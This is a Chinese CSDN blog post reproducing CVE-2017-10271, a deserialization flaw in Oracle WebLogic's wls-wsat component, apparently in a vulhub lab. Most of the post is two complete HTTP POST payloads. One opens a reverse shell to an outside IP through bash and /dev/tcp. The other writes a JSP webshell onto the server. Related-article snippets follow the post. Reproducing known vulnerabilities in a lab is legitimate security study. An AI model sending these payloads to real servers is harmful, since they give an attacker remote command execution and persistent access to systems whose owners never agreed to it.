Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)

最新推荐文章于 2023-11-05 14:00:12 发布
最新推荐文章于 2023-11-05 14:00:12 发布
阅读量369 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119758665
版权

漏洞简介

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

影响范围

Oracle WebLogic Server 10.3.6.0.0版本,12.1.3.0.0版本,12.2.1.1.0版本,12.2.1.2.0版本。

漏洞复现

发送如下数据包来反弹shell:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.30.128/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

或者写入webshell(访问:http://your-ip:7001/bea_wls_internal/test.jsp):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic XMLDecoder序列漏洞(CVE-2017-10271)
SoulCat
02-12 2580
Weblogic XMLDecoder序列漏洞(CVE-2017-10271) 漏洞概述: -漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。 漏洞版本: 10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0 漏洞搭建...
Weblogic XMLDecoder 序列漏洞CVE-2017-10271)
qq_44806973的博客
12-07 378
weblogic序列漏洞CVE-2017-10271 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现序列漏洞,导致可执行任意命令。 复现步骤: 启动环境后打开目标地址:出现404可能存在序列漏洞 抓包发送给repeater,将GET改成POST,增加Content-Type: text/xml 3. 在body中插入POC <soapenv:Envelope xmlns
漏洞复现】weblogic-10.3.6-wls-wsat-XMLDecoder序列(CVE-2017-10271)
最新发布
过期的秋刀鱼
11-05 945
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现序列漏洞,导致可执行任意命令。即可看到一个404页面,说明weblogic已成功启动。
Weblogic 10.3.6 ‘wls-wsatXMLDecoder 序列漏洞CVE-2017-10271)
黑白的博客
12-05 616
声明 好好学习,天天向上 漏洞描述 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现序列漏洞,导致可执行任意命令。 影响范围 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 复现过程 这里使用10.3.6.0版本 使用vulhub cd /app/vulhub-master/weblogic/CVE-2017-10271 使用docker启动 docker
[Vulhub] Weblogic < 10.3.6 ‘wls-wsatXMLDecoder 序列漏洞CVE-2017-10271)
weixin_45605352的博客
05-16 468
0x00 Java序列漏洞 java序列序列 Java的序列(Serialize)与序列(Deserialize)是对IO流的一种机制。Java序列的目标是将对象保存到磁盘中或允许在网络中直接传输对象。序列机制将允许实现序列的java对象转换成不依赖平台的字节序列,这些字节序列可以保存在磁盘上,或通过网络传输。而Java的序列可以把字节序列恢复为Java对象,也就是说序列将一个Java对象写入IO流中,序列从这个IO流中恢复这个对象,目的是使对象可以脱离Java运行环境,实
weblogic __ 10.3.6 __ 序列漏洞 _ CVE-2017-10271
cgjil的博客
09-16 214
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。2、对wls-wsat的资源访问在防火墙或路由器和交换机上做acl访问控制规则。3、在不影响业务的前提下删除相应war包。1、更新Oracle相应补丁。
java weblogic序列,WebLogic 序列漏洞(CVE-2017-10271)
weixin_39851809的博客
03-13 111
0x00 WebLogic WLS组件序列漏洞这个漏洞的编号是 CVE-2017-10271,漏洞存在于 Oracle WebLogicwls-wsat 组件中,该组件的 XMLDecoder 方法在序列时存在漏洞可远程代码执行,凡是版本号 < 10.3.6 的都受到影响,刚出来时没有看,现在记录一下0x01 访问远程文件POST /wls-wsat/CoordinatorPo...
CVE-2017-10271 Weblogic序列漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的序列漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的序列过程。这个组件是...
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
工具"Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java序列漏洞。在Java中,序列是将对象的状态转为...
关于禁用weblogic wls-wsat组件的步骤说明
09-03
WebLogic WLS组件漏洞,文档描述如何通过禁用组件的方式来修补漏洞
weblogic10.3.6补丁(java序列漏洞更新步骤).docx
09-10
weblogic10.3.6补丁(java序列漏洞更新步骤).docx
Weblogic+XML序列漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 序列漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
CVE-2017-10271 Weblogic序列漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
在2017年,WebLogic服务器被发现存在一个名为CVE-2017-10271的安全漏洞,这是一个高危级别的序列漏洞。这个漏洞允许攻击者通过构造恶意的Java对象序列数据,远程执行任意代码,从而控制受影响的系统。 **CVE-...
Weblogic远程代码执行漏洞(CVE-2020-14750)修复步骤--weblogic10.3.6版本
热门推荐
skyfans的博客
11-25 1万+
针对于weblogic console的内容,2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750。此漏洞CVE-2020-14882有关,该漏洞已在2020年10月的关键补丁更新中解决。此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络进行攻击。 详细内容可参见官网宣布内容:CVE-2020-14750 相应影响版本如下: 针对于此漏洞,官网下载的补丁文件中,
weblogic中间件漏洞总结
weixin_42345596的博客
08-14 3285
一.weblogic简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic Se
记一次weblogic-10.3.6.0靶场漏洞利用
屿的博客
09-15 7392
输入 find ./ -name oracle_logo.gif(文件名)进入Vuln-Range的weblogic-10.3.6.0靶场。(去掉. 去掉图片文件名再自己起一个新的文件名 xx.jsp)进入最开始的/uddiexplorer/下的自命名木马.jsp。删掉端口后面多余字符,输入/uddiexplorer/打印出的工作目录和刚刚保存的gif文件路径拼接在一起。在weblogic工具里使用pwd打印工作目录。连接复制到weblogic的shell上传。找到的路径用记事本保存一下。
关于weblogic 10.3.6.0 的漏洞复现(2)
weixin_30813225的博客
05-09 805
今天小R又学会了一个工具的使用,而且这个工具很强大很强大。 待会介绍。 一、需要的试验环境: 一台宿主机,虚拟机(kali+window2008或其他版本的windows)1.宿主机需要的工具:BT(burpsuite) 2.虚拟机kali:CobaltStrike 工具(我用的是3.8版本),由于这个工具容易被百度云和谐我就步发百度云链接了。可以找我要:QQ1356187559 3....
CVE-2020-14644:WebLogic IIOP序列漏洞深度解析
"CVE-2020-14644是一个针对Oracle WebLogic Server的IIOP(Internet Inter-ORB Protocol)序列漏洞,主要影响12.2.1.3.0, 12.2.1.4.0, 和14.1.1.0.0这几个版本。该漏洞允许攻击者通过精心构造的恶意输入来触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值